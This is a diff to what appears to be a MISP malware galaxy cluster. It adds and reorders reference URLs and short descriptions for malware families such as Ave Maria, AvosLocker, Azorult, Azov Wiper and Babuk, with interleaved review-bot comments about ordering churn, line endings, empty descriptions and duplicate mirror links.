+ "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw",
+ "https://www.huntress.com/blog/ave-maria-and-the-chambers-of-warzone-rat",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://reaqta.com/2019/04/ave_maria-malware-part1/",
"https://blog.morphisec.com/syk-crypter-discord",
- "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest",
- "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
+ "https://blog.yoroi.company/research/the-ave_maria-malware/",
+ "https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://kienmanowar.wordpress.com/2023/03/25/quicknote-decrypting-the-c2-configuration-of-warzone-rat/",
+ "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique",
+ "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA",
+ "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0919.pdf",
+ "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/",
"https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/"
+ "https://asec.ahnlab.com/en/36629/",
+ "https://ti.qianxin.com/blog/articles/Kasablanka-Group-Probably-Conducted-Compaigns-Targeting-Russia/",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/",
+ "https://exploitreversing.files.wordpress.com/2022/11/mas_6-1.pdf"
],
"synonyms": [
"AVE_MARIA",
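Review bot: of the 38 lines marked added in the Ave Maria refs, 29 are re-additions of the 29 removed lines and only nine are genuinely new (spamhaus 2022 Q3 and 2023 Q1, cocomelonc, huntress, securelist tomiris, kienmanowar, recordedfuture cta-2022-0919, ti.qianxin, exploitreversing); a stable sort order in the generator would reduce this hunk to those nine lines. Separately, the morphisec reference is carried over with a plain `http://` scheme (`http://blog.morphisec.com/threat-alert-ave-maria-...`); normalize it to https if the page resolves there.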
@@ -13114,26 +13950,26 @@
"value": "Ave Maria"
},
{
- "description": "",
+ "description": "AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.\r\n\r\nIn March 2022, the FBI and US Treasury Department issued a warning about the attacks.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
- "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
- "https://www.ic3.gov/Media/News/2022/220318.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
"https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/",
- "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/",
+ "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
"https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
- "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen",
- "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/",
+ "https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf",
+ "https://www.ic3.gov/Media/News/2022/220318.pdf",
+ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html",
+ "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux",
+ "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen"
],
"synonyms": [],
"type": []
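Review bot: the new AvosLocker description embeds literal `\r\n\r\n` inside the JSON string to separate its two paragraphs; no other description in this section uses CRLF sequences, and carriage returns render inconsistently in MISP consumers and trip line-ending linters. Either collapse the text to a single paragraph or use a plain `\n`, and have the generator normalize line endings so this does not recur.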
@@ -13154,6 +13990,19 @@
"uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3",
"value": "Avzhan"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.axlocker",
+ "https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "017ea8db-6eb4-4df1-bac0-da908d2aea9f",
+ "value": "AXLocker"
+ },
{
"description": "",
"meta": {
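Review bot: the new AXLocker entry ships with `"description": ""` although the Cyble write-up in its refs is available to summarize; an empty description gives analysts nothing to match on in the galaxy view. If the generator mirrors the upstream description field, a one-line summary should be added upstream rather than patched here so it is not overwritten on the next refresh.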
@@ -13185,66 +14034,68 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult",
- "https://community.riskiq.com/article/56e28880",
- "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
- "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
- "https://community.riskiq.com/article/2a36a7d2/description",
- "https://fr3d.hk/blog/gazorp-thieving-from-thieves",
- "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
- "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update",
- "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/",
- "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
- "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/",
- "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
- "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
- "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html",
- "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
- "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05",
- "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/",
- "https://twitter.com/DrStache_/status/1227662001247268864",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html",
- "https://asec.ahnlab.com/en/26517/",
- "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://isc.sans.edu/diary/25120",
+ "https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
+ "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
"https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
+ "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/",
+ "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html",
+ "https://community.riskiq.com/article/56e28880",
+ "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html",
"https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
- "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://asec.ahnlab.com/en/26517/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/",
"https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers",
- "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://securelist.com/azorult-analysis-history/89922/",
- "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
- "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/",
- "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/",
- "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
"https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/",
+ "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/",
+ "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update",
"https://unit42.paloaltonetworks.com/cybersquatting/",
+ "https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/",
+ "https://fr3d.hk/blog/gazorp-thieving-from-thieves",
+ "https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/",
+ "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
+ "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/",
+ "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/",
+ "https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://community.riskiq.com/article/2a36a7d2/description",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html",
+ "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/",
+ "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
"https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/",
+ "https://securelist.com/azorult-analysis-history/89922/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
+ "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/",
+ "https://twitter.com/DrStache_/status/1227662001247268864",
+ "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
"https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [
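Review bot: after the reorder the Azorult refs still count the same article twice under different hosts: the Aggah write-up appears as both `yoroi.company/research/aggah-...` and `blog.yoroi.company/research/aggah-...`, and the RoboSki post as both `securityintelligence.com/posts/roboski-global-recovery-automation/` and `ciphertechsolutions.com/roboski-global-recovery-automation/`. Keep one of each, or have the generator collapse known mirror hosts, so reference counts are not inflated.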
@@ -13256,31 +14107,50 @@
"uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c",
"value": "Azorult"
},
+ {
+ "description": "According to Checkpoint, this malware is a wiper instead of ransomware as self-announced. It is manually written in FASM, unrecoverably overwriting data in blocks of 666 bytes, using multi-threading.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper",
+ "https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/",
+ "https://twitter.com/_CPResearch_/status/1587837524604465153",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "db8dee2a-938e-46af-b2e3-ef5d6e626da7",
+ "value": "Azov Wiper"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda",
+ "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcb369e1-0783-4188-8841-936c6976035f",
+ "value": "Babadeda"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babar",
- "http://www.spiegel.de/media/media-35683.pdf",
"https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/",
"https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/",
- "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/"
+ "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/",
+ "http://www.spiegel.de/media/media-35683.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/"
],
"synonyms": [
"SNOWBALL"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "57b221bc-7ed6-4080-bc66-813d17009485",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
"value": "Babar"
},
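Review bot: the `related` array on the Babar entry (dest-uuid `57b221bc-7ed6-4080-bc66-813d17009485`, type `similar`, with its estimative-language tag) is deleted outright, which silently drops a cross-galaxy link that consumers of this cluster may rely on; confirm this is intended (for example because relationships are now generated at build time rather than stored in the cluster) and document it in the commit message. The new `Babadeda` entry also ships with an empty `description`; the Morphisec reference it cites could supply a one-line summary so the entry is not a bare UUID and name.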
@@ -13289,54 +14159,55 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
- "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
- "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/",
- "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://securelist.com/ransomware-world-in-2021/102169/",
- "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
- "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
- "https://twitter.com/Sebdraven/status/1346377590525845504",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/",
- "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
- "https://twitter.com/GossiTheDog/status/1409117153182224386",
- "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
- "https://www.fr.sogeti.com/globalassets/france/avis-dexperts--livres-blancs/cybersecchronicles_-_babuk.pdf",
- "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
- "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
- "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
- "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
- "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
- "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2",
+ "https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/",
"https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
- "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
- "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
- "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
- "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/",
"https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/",
+ "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d",
+ "https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/",
"https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html",
+ "https://twitter.com/Sebdraven/status/1346377590525845504",
+ "https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/",
+ "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
"https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/",
"https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt",
+ "https://twitter.com/GossiTheDog/status/1409117153182224386",
+ "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/",
+ "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/",
+ "https://blog.morphisec.com/babuk-ransomware-variant-major-attack",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "https://securelist.com/ransomware-world-in-2021/102169/",
+ "https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/",
+ "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
+ "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/",
+ "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/",
+ "https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b",
+ "https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf",
+ "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/",
"https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings",
